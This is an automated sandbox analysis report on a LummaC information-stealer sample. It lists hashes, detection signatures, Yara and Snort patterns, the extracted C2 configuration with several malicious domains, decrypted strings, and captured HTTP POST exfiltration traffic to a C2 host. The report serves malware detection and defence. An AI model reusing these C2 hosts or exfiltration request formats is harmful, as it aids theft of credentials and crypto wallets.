Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
o7b91j8vnJ.exe

Overview

General Information

Sample name:o7b91j8vnJ.exe
renamed because original name is a hash value
Original sample name:7b3e62bcbeed62a180220669f6a0c548.exe
Analysis ID:1431408
MD5:7b3e62bcbeed62a180220669f6a0c548
SHA1:3d12e7bf87ce03fe4c59c5127e225dfd37b7a530
SHA256:32cad0a627c9f3bf1172d0fc11a5492b2ff20e3e5509f53e0ac83e87d15f2a5d
Tags:32exetrojan
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • o7b91j8vnJ.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\o7b91j8vnJ.exe" MD5: 7B3E62BCBEED62A180220669F6A0C548)
    • WerFault.exe (PID: 7128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: o7b91j8vnJ.exe PID: 6856JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: o7b91j8vnJ.exe PID: 6856JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:04/25/24-01:59:52.426039
            SID:2052229
            Source Port:56700
            Destination Port:53
            Protocol:UDP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:52.576860
            SID:2052230
            Source Port:49730
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:56.147948
            SID:2052230
            Source Port:49734
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:57.117668
            SID:2052230
            Source Port:49735
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:53.349065
            SID:2052230
            Source Port:49731
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:59.483318
            SID:2052230
            Source Port:49737
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:54.263019
            SID:2052230
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:58.166541
            SID:2052230
            Source Port:49736
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/25/24-01:59:55.123309
            SID:2052230
            Source Port:49733
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: o7b91j8vnJ.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://strollheavengwu.shop/apiAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0.2.o7b91j8vnJ.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--superstar"}
            Multi AV Scanner detection for domain / URL
            Source: tolerateilusidjukl.shopVirustotal: Detection: 14%Perma Link
            Source: shortsvelventysjo.shopVirustotal: Detection: 16%Perma Link
            Source: https://strollheavengwu.shop/apiVirustotal: Detection: 10%Perma Link
            Source: https://strollheavengwu.shop/apieVirustotal: Detection: 5%Perma Link
            Source: demonstationfukewko.shopVirustotal: Detection: 18%Perma Link
            Source: productivelookewr.shopVirustotal: Detection: 16%Perma Link
            Source: shatterbreathepsw.shopVirustotal: Detection: 17%Perma Link
            Source: https://strollheavengwu.shop/dVirustotal: Detection: 9%Perma Link
            Source: alcojoldwograpciw.shopVirustotal: Detection: 17%Perma Link
            Source: https://strollheavengwu.shop/eVirustotal: Detection: 9%Perma Link
            Source: incredibleextedwj.shopVirustotal: Detection: 14%Perma Link
            Source: liabilitynighstjsko.shopVirustotal: Detection: 17%Perma Link
            Multi AV Scanner detection for submitted file
            Source: o7b91j8vnJ.exeVirustotal: Detection: 42%Perma Link
            Machine Learning detection for sample
            Source: o7b91j8vnJ.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: demonstationfukewko.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: liabilitynighstjsko.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: alcojoldwograpciw.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: incredibleextedwj.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: shortsvelventysjo.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: shatterbreathepsw.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: tolerateilusidjukl.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: productivelookewr.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: strollheavengwu.shop
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmpString decryptor: P6Mk0M--superstar
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 0_2_00415999 CryptUnprotectData,0_2_00415999

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeUnpacked PE file: 0.2.o7b91j8vnJ.exe.400000.0.unpack
            Source: o7b91j8vnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.163.209:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: Binary string: C:\makeba20\noxadikayovic.pdb source: o7b91j8vnJ.exe
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00422458
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041C540
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_004357CA
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_004359E2
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A4h]0_2_00414C49
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_00433D10
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]0_2_00433D10
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00424087
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00424084
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0040D140
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov esi, ebp0_2_00403260
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00423943
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_0041F234
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then inc ebx0_2_004142F0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then push 00000000h0_2_0041E451
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0041A420
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0041A420
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then jmp ecx0_2_00414596
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_0041F640
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], dx0_2_004146E6
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+4Ch]0_2_0042271D
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then inc eax0_2_004137C9
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movzx ebx, word ptr [edx]0_2_0041F828
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_0041A8C0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0042F890
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_0042594F
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_004259CD
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_004259D2
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000E0h]0_2_00411A44
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then inc ebx0_2_0040FA49
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movzx ebp, byte ptr [eax+edx]0_2_00431A70
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h0_2_0041CAEC
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then jmp edx0_2_00437C47
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then jmp edx0_2_00437C45
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+000000C0h]0_2_00413C46
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00421CC7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+30h]0_2_00424CB0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]0_2_00415D7D
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+000005E0h]0_2_00413E4A
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_041EF49B
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [00440984h]0_2_041E7494
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_041F3BAA
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov esi, ebp0_2_041D34C7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then inc ebx0_2_041E4557
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_041EA687
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], dx0_2_041EA687
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_041F26BF
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then push 00000000h0_2_041EE6B8
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_041EC7A7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then jmp ecx0_2_041E47FD
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+000005E0h]0_2_041E40B1
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_041F42EE
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_041F42EB
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h0_2_041ED377
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_041DD3A7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_041F5C39
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_041F5C34
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_04205C49
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then inc ebx0_2_041DFCB0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000E0h]0_2_041E1CAB
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movzx ebp, byte ptr [eax+edx]0_2_04201CD7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then jmp edx0_2_04207EAC
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then jmp edx0_2_04207EAE
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A4h]0_2_041E4EB0
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+000000C0h]0_2_041E3EAD
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+30h]0_2_041F4F17
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_041F1F2E
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_04203F77
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]0_2_04203F77
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]0_2_041E5FE4
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_041EF8A7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov word ptr [eax], dx0_2_041E494D
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov edx, dword ptr [esi+4Ch]0_2_041F2984
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_04205A31
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then inc eax0_2_041E3A30
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movzx ebx, word ptr [edx]0_2_041EFA8F
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_041FFAF7
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_041EAB27
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_041F5BB6

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2052229 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop) 192.168.2.4:56700 -> 1.1.1.1:53
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49730 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49731 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49732 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49733 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49734 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49735 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49736 -> 172.67.163.209:443
            Source: TrafficSnort IDS: 2052230 ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) 192.168.2.4:49737 -> 172.67.163.209:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: demonstationfukewko.shop
            Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
            Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
            Source: Malware configuration extractorURLs: incredibleextedwj.shop
            Source: Malware configuration extractorURLs: shortsvelventysjo.shop
            Source: Malware configuration extractorURLs: shatterbreathepsw.shop
            Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
            Source: Malware configuration extractorURLs: productivelookewr.shop
            Source: Malware configuration extractorURLs: strollheavengwu.shop
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 58Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18167Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8788Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20441Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5438Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1412Host: strollheavengwu.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574078Host: strollheavengwu.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: strollheavengwu.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
